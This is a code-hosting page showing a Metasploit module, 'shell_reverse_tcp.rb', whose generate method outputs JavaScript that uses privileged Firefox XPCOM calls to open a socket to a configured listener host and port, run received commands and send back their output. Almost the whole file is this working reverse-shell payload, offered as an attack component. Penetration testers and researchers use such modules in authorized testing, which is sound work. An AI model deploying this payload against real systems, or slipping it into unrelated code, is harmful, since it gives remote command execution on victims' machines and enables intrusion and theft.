PageRenderTime 117ms CodeModel.GetById 17ms RepoModel.GetById 0ms app.codeStats 0ms

/modules/payloads/singles/firefox/shell_reverse_tcp.rb

https://gitlab.com/0072016/metasploit-framework-rapid7
Ruby | 73 lines | 54 code | 13 blank | 6 comment | 1 complexity | 5a4f78733e06d200c07e5b6c81705fcb MD5 | raw file
    

  1. ##
    2. 

  2. # This module requires Metasploit: http://metasploit.com/download
    3. 

  3. # Current source: https://github.com/rapid7/metasploit-framework
    4. 

  4. ##
    5. 

  5. 

  6. require 'msf/core'
    7. 

  7. require 'msf/core/handler/reverse_tcp'
    8. 

  8. require 'msf/base/sessions/command_shell'
    9. 

  9. require 'msf/base/sessions/command_shell_options'
    10. 

  10. 

  11. module MetasploitModule
    12. 

  12. 

  13.   CachedSize = :dynamic
    14. 

  14. 

  15.   include Msf::Payload::Single
    16. 

  16.   include Msf::Payload::Firefox
    17. 

  17.   include Msf::Sessions::CommandShellOptions
    18. 

  18. 

  19.   def initialize(info={})
    20. 

  20.     super(merge_info(info,
    21. 

  21.       'Name'          => 'Command Shell, Reverse TCP (via Firefox XPCOM script)',
    22. 

  22.       'Description'   => %q{Creates an interactive shell via Javascript with access to Firefox's XPCOM API},
    23. 

  23.       'Author'        => ['joev'],
    24. 

  24.       'License'       => BSD_LICENSE,
    25. 

  25.       'Platform'      => 'firefox',
    26. 

  26.       'Arch'          => ARCH_FIREFOX,
    27. 

  27.       'Handler'       => Msf::Handler::ReverseTcp,
    28. 

  28.       'Session'       => Msf::Sessions::CommandShell,
    29. 

  29.       'PayloadType'   => 'firefox'
    30. 

  30.     ))
    31. 

  31.   end
    32. 

  32. 

  33.   def generate
    34. 

  34.     <<-EOS
    35. 

  35. 

  36.       (function(){
    37. 

  37.         window = this;
    38. 

  38. 

  39.         Components.utils.import("resource://gre/modules/NetUtil.jsm");
    40. 

  40.         var host = '#{datastore["LHOST"]}';
    41. 

  41.         var port = #{datastore["LPORT"]};
    42. 

  42. 

  43.         var socketTransport = Components.classes["@mozilla.org/network/socket-transport-service;1"]
    44. 

  44.                                 .getService(Components.interfaces.nsISocketTransportService);
    45. 

  45.         var socket = socketTransport.createTransport(null, 0, host, port, null);
    46. 

  46.         var outStream = socket.openOutputStream(0, 0, 0);
    47. 

  47.         var inStream = socket.openInputStream(0, 0, 0);
    48. 

  48. 

  49.         var pump = Components.classes["@mozilla.org/network/input-stream-pump;1"]
    50. 

  50.                        .createInstance(Components.interfaces.nsIInputStreamPump);
    51. 

  51.         pump.init(inStream, -1, -1, 0, 0, true);
    52. 

  52. 

  53.         #{read_until_token_source}
    54. 

  54. 

  55.         var listener = {
    56. 

  56.           onStartRequest: function(request, context) {},
    57. 

  57.           onStopRequest: function(request, context) {},
    58. 

  58.           onDataAvailable: readUntilToken(function(data) {
    59. 

  59.             runCmd(data, function(err, output) {
    60. 

  60.               if (!err) outStream.write(output, output.length);
    61. 

  61.             });
    62. 

  62.           })
    63. 

  63.         };
    64. 

  64. 

  65.         #{run_cmd_source}
    66. 

  66. 

  67.         pump.asyncRead(listener, null);
    68. 

  68.       })();
    69. 

  69. 

  70.     EOS
    71. 

  71.   end
    72. 

  72. 

  73. end
    74. 

  74.